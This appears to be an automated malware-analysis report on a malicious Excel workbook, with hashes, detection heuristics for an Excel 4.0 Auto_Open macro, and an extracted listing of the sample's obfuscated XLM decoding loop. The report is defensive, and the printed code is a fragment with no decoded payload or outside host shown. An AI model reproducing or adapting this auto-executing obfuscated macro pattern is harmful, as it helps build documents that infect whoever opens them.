Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4a913212c5dd1ef7…

MALICIOUS

Office (OLE)

36.5 KB Created: 2020-11-27 11:43:51 Authoring application: Microsoft Excel First seen: 2021-03-31
MD5: d68adc87faf946d3db2da5bbce07edae SHA-1: 37b0ebb42d5fc06e4d80fe53ec713011bb81707a SHA-256: 4a913212c5dd1ef74b7d363042d51f25fdf5231166c5f4b4f3fc5444e860b030
140 Risk Score

Heuristics 3

  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 6915 bytes
SHA-256: 195d2d61a71069550f3c4c8841224116b3261b97e75f17875baeaff81b7bb4e3
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     20 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  FZRyAlDSBVf
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!G165 
' 0018     26 LABEL : Cell Value, String Constant - bkVaByrLXEu len=0 
' 0018     22 LABEL : Cell Value, String Constant - busOUSI len=0 
' 0018     26 LABEL : Cell Value, String Constant - enRZwagpdDC len=0 
' 0018     25 LABEL : Cell Value, String Constant - fbuXoFqhal len=0 
' 0018     22 LABEL : Cell Value, String Constant - fMdcHav len=0 
' 0018     25 LABEL : Cell Value, String Constant - GDnPfTXdUa len=0 
' 0018     24 LABEL : Cell Value, String Constant - GrEBSJkiS len=0 
' 0018     27 LABEL : Cell Value, String Constant - GRREbrVgllDv len=0 
' 0018     22 LABEL : Cell Value, String Constant - gweTQgO len=0 
' 0018     22 LABEL : Cell Value, String Constant - hhPGEGE len=0 
' 0018     20 LABEL : Cell Value, String Constant - jCltU len=0 
' 0018     27 LABEL : Cell Value, String Constant - OCxwIQMeXSxu len=0 
' 0018     22 LABEL : Cell Value, String Constant - PJNyOie len=0 
' 0018     25 LABEL : Cell Value, String Constant - PnPSgQWGOm len=0 
' 0018     23 LABEL : Cell Value, String Constant - VsTPaltv len=0 
' 0018     23 LABEL : Cell Value, String Constant - wnodfiNU len=0 
' 0018     26 LABEL : Cell Value, String Constant - YrAHVmlJYzS len=0 
' 0018     26 LABEL : Cell Value, String Constant - YtZXVYZYWaw len=0 
' 0018     26 LABEL : Cell Value, String Constant - YXeePaCLzuX len=0 
' 0018     24 LABEL : Cell Value, String Constant - zpXIfFQZK len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  FZRyAlDSBVf,P48,"",868.00000000000000000000
'  FZRyAlDSBVf,P49,"",-18.00000000000000000000
'  FZRyAlDSBVf,P50,"",-751.00000000000000000000
'  FZRyAlDSBVf,P51,"",-809.00000000000000000000
'  FZRyAlDSBVf,P52,"",874.00000000000000000000
'  FZRyAlDSBVf,P53,"",-928.00000000000000000000
'  FZRyAlDSBVf,G81,"SET.NAME("GDnPfTXdUa",0+VALUE("0"))",""
'  FZRyAlDSBVf,G85,"SET.NAME("VsTPaltv",GDnPfTXdUa)",""
'  FZRyAlDSBVf,G90,"SET.NAME("hhPGEGE",GDnPfTXdUa)",""
'  FZRyAlDSBVf,G93,"SET.NAME("OCxwIQMeXSxu",COUNTA(YXeePaCLzuX))",""
'  FZRyAlDSBVf,G95,"SET.NAME("busOUSI",COUNTA(YrAHVmlJYzS))",""
'  FZRyAlDSBVf,G97,[],""
'  FZRyAlDSBVf,G99,"SET.NAME("gweTQgO","")",""
'  FZRyAlDSBVf,G102,"VsTPaltv",""
'  FZRyAlDSBVf,G106,"SET.NAME("bkVaByrLXEu",HLOOKUP("*",YXeePaCLzuX,VsTPaltv,FALSE))",""
'  FZRyAlDSBVf,G110,"jCltU",""
'  FZRyAlDSBVf,G113,"SET.NAME("GRREbrVgllDv",GDnPfTXdUa)",""
'  FZRyAlDSBVf,G115,[],""
'  FZRyAlDSBVf,G120,"GRREbrVgllDv",""
'  FZRyAlDSBVf,G123,"PnPSgQWGOm",""
'  FZRyAlDSBVf,G126,"enRZwagpdDC",""
'  FZRyAlDSBVf,G128,"fMdcHav",""
'  FZRyAlDSBVf,G132,"SET.NAME("PJNyOie",VALUE(HLOOKUP("*",YrAHVmlJYzS,fMdcHav,FALSE)))",""
'  FZRyAlDSBVf,G137,"zpXIfFQZK",""
'  FZRyAlDSBVf,G142,"gweTQgO",""
'  FZRyAlDSBVf,G146,"hhPGEGE",""
'  FZRyAlDSBVf,G149,NEXT(),""
'  FZRyAlDSBVf,G151,"wnodfiNU",""
'  FZRyAlDSBVf,G154,[],""
'  FZRyAlDSBVf,G156,"fbuXoFqhal",""
'  FZRyAlDSBVf,G158,NEXT(),""
'  FZRyAlDSBVf,G162,RETURN(),""
'  FZRyAlDSBVf,G194,"SET.NAME("YtZXVYZYWaw",G81)",""
'  FZRyAlDSBVf,G199,"YXeePaCLzuX",""
'  FZRyAlDSBVf,G202,"SET.NAME("YrAHVmlJYzS",R65C14)",""
'  FZRyAlDSBVf,G206,"SET.NAME("fbuXoFqhal",215)",""
'  FZRyAlDSBVf,G209,"SET.NAME("GrEBSJkiS",7)",""
'  FZRyAlDSBVf,G214,YtZXVYZYWaw(),""
'  FZRyAlDSBVf,G215,HALT(),""